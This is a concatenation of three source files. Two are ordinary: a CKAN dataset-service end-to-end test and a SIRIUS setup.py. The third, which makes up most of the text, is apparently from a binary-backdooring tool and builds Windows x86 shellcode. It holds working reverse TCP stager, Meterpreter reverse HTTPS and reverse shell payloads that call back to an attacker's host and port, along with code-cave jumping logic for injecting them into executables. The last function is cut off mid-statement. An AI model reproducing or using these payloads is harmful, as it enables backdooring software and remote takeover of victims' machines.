dataset_result = self.engine.create_dataset(name=self.test_dataset_name, version='1.0', owner_org=self.test_org)
if not dataset_result['success']:
raise requests.RequestException('Unable to create test dataset: {}'.format(dataset_result['error']))
self.test_dataset = dataset_result['result']
# Create Test Resource
self.test_resource_name = random_string_generator(10)
self.test_resource_url = 'http://home.byu.edu'
resource_result = self.engine.create_resource(self.test_dataset_name,
url=self.test_resource_url, format='zip')
if not resource_result['success']:
raise requests.RequestException('Unable to create test resource: {}'.format(resource_result['error']))
self.test_resource = resource_result['result']
def tearDown(self):
pass
# Delete test resource and dataset
self.engine.delete_dataset(dataset_id=self.test_dataset_name)
def test_create_dataset(self):
# Setup
new_dataset_name = random_string_generator(10)
# Execute
result = self.engine.create_dataset(name=new_dataset_name, owner_org=self.test_org)
# Verify Success
self.assertTrue(result['success'])
# Should return the new one
self.assertEqual(new_dataset_name, result['result']['name'])
# TEST search_datasets
result = self.engine.search_datasets(query={'name': new_dataset_name}, console=False)
# Verify Success
self.assertTrue(result['success'])
# Check search results
search_results = result['result']['results']
self.assertIn(new_dataset_name, search_results[0]['name'])
self.assertIn(self.test_org, search_results[0]['organization']['name'])
# TEST list_datasets
# Execute
result = self.engine.list_datasets()
# Verify Success
self.assertTrue(result['success'])
self.assertIn(new_dataset_name, result['result'])
# Delete
result = self.engine.delete_dataset(dataset_id=new_dataset_name)
# Check if success
self.assertTrue(result['success'])
def test_create_resource_file(self):
# Prepare
file_name = 'upload_test.txt'
save_name = random_string_generator(10)
file_to_upload = os.path.join(self.support_root, file_name)
# Execute
result = self.engine.create_resource(dataset_id=self.test_dataset_name,
name=save_name,
file=file_to_upload)
# Verify Success
self.assertTrue(result['success'])
# Verify name and url_type (which should be upload if file upload)
self.assertIn(save_name, result['result']['name'])
self.assertEqual(result['result']['url_type'], 'upload')
# TEST search resource
# Execute
result = self.engine.search_resources(query={'name': save_name})
# Verify Success
self.assertTrue(result['success'])
self.assertIn(save_name, result['result']['results'][-1]['name'])
# Delete
result = self.engine.delete_resource(resource_id=result['result']['results'][-1]['id'])
self.assertTrue(result['success'])
def test_create_resource_url(self):
# Prepare
new_resource_name = random_string_generator(10)
new_resource_url = 'http://home.byu.edu/'
# Execute
result = self.engine.create_resource(dataset_id=self.test_dataset_name,
url=new_resource_url,
name=new_resource_name)
# Verify Success
self.assertTrue(result['success'])
# Verify name and url_type (which should be upload if file upload)
self.assertIn(new_resource_name, result['result']['name'])
self.assertEqual(result['result']['url'], new_resource_url)
# TEST search resource
# Execute
result = self.engine.search_resources(query={'name': new_resource_name})
# Verify Success
self.assertTrue(result['success'])
self.assertIn(new_resource_name, result['result']['results'][-1]['name'])
self.assertIn(new_resource_url, result['result']['results'][-1]['url'])
# Delete
result = self.engine.delete_resource(resource_id=result['result']['results'][-1]['id'])
self.assertTrue(result['success'])
def test_update_dataset(self):
# Setup
notes = random_string_generator(10)
author = random_string_generator(5)
# Execute
result = self.engine.update_dataset(dataset_id=self.test_dataset_name,
author=author, notes=notes)
# Verify Success
self.assertTrue(result['success'])
# Verify new property
self.assertEqual(result['result']['author'], author)
self.assertEqual(result['result']['notes'], notes)
# TEST get_dataset
# Execute
result = self.engine.get_dataset(dataset_id=self.test_dataset_name)
# Verify Success
self.assertTrue(result['success'])
# Verify Name
self.assertEqual(result['result']['name'], self.test_dataset_name)
self.assertEqual(result['result']['author'], author)
self.assertEqual(result['result']['notes'], notes)
# TEST download_dataset
location = self.files_root
result = self.engine.download_dataset(self.test_dataset_name,
location=location)
# Result will return list of the file with .zip at the end. Check here
self.assertIn('.zip', result[0][-4:].lower())
download_file = os.path.basename(result[0])
location_final = os.path.join(self.files_root, download_file)
# Delete the file
if os.path.isfile(location_final):
os.remove(location_final)
else:
raise AssertionError('No file has been downloaded')
# TEST delete_dataset
# Execute
result = self.engine.delete_dataset(dataset_id=self.test_dataset_name)
# Confirm Success
self.assertTrue(result['success'])
# Delete requests should return nothing
self.assertEqual(result['result'], None)
def test_update_resource(self):
# Get Resource ID
result = self.engine.get_dataset(dataset_id=self.test_dataset_name)
resource_id = result['result']['resources'][0]['id']
# Setup
file_name = 'upload_test.txt'
file_to_upload = os.path.join(self.support_root, file_name)
description_new = random_string_generator(10)
# Execute
result = self.engine.update_resource(resource_id=resource_id,
file=file_to_upload,
description=description_new)
# Verify Success
self.assertTrue(result['success'])
# Verify Name (should be the same as the file uploaded by default)
self.assertEqual(result['result']['name'], file_name)
self.assertEqual(result['result']['description'], description_new)
# TEST get_resource
# Execute
result = self.engine.get_resource(resource_id=resource_id)
# Verify Success
self.assertTrue(result['success'])
# Verify Properties
self.assertEqual(result['result']['name'], file_name)
self.assertEqual(result['result']['description'], description_new)
# TEST download_resource
location = self.files_root
result = self.engine.download_resource(resource_id=resource_id, location=location)
# Result will return list of the file with .zip at the end. Check here
self.assertIn('.zip', result[-4:].lower())
download_file = os.path.basename(result)
location_final = os.path.join(self.files_root, download_file)
# Delete the file
if os.path.isfile(location_final):
os.remove(location_final)
else:
raise AssertionError('No file has been downloaded')
# TEST delete_resource
# Execute
result = self.engine.delete_resource(resource_id=resource_id)
# Verify Success
self.assertTrue(result['success'])
# Delete requests should return nothing
self.assertEqual(result['result'], None)
def test_validate(self):
self.engine.validate()
def test_validate_status_code(self):
self.engine2 = CkanDatasetEngine(endpoint="http://localhost:5000/api/a/action/",
apikey=TEST_CKAN_DATASET_SERVICE['APIKEY'])
self.assertRaises(AssertionError, self.engine2.validate)
| tethysplatform/tethys_dataset_services | tethys_dataset_services/tests/e2e_tests/ckan_engine_e2e_tests.py | Python | bsd-2-clause | 10,844 |
import setuptools
setuptools.setup(
name="sirius",
version="0.5",
author="",
author_email="[email protected]",
description="pySIRIUS",
url="https://github.com/electronic_structure/SIRIUS",
packages=['sirius'],
install_requires=['mpi4py', 'voluptuous', 'numpy', 'h5py', 'scipy', 'PyYAML'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| electronic-structure/sirius | python_module/setup.py | Python | bsd-2-clause | 499 |
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import sys
import struct
from intelmodules import eat_code_caves
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.shellcode = ""
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += ("\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x90" * 40
)
self.shellcode2 = ("\x90" * 48
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += ("\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
)
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
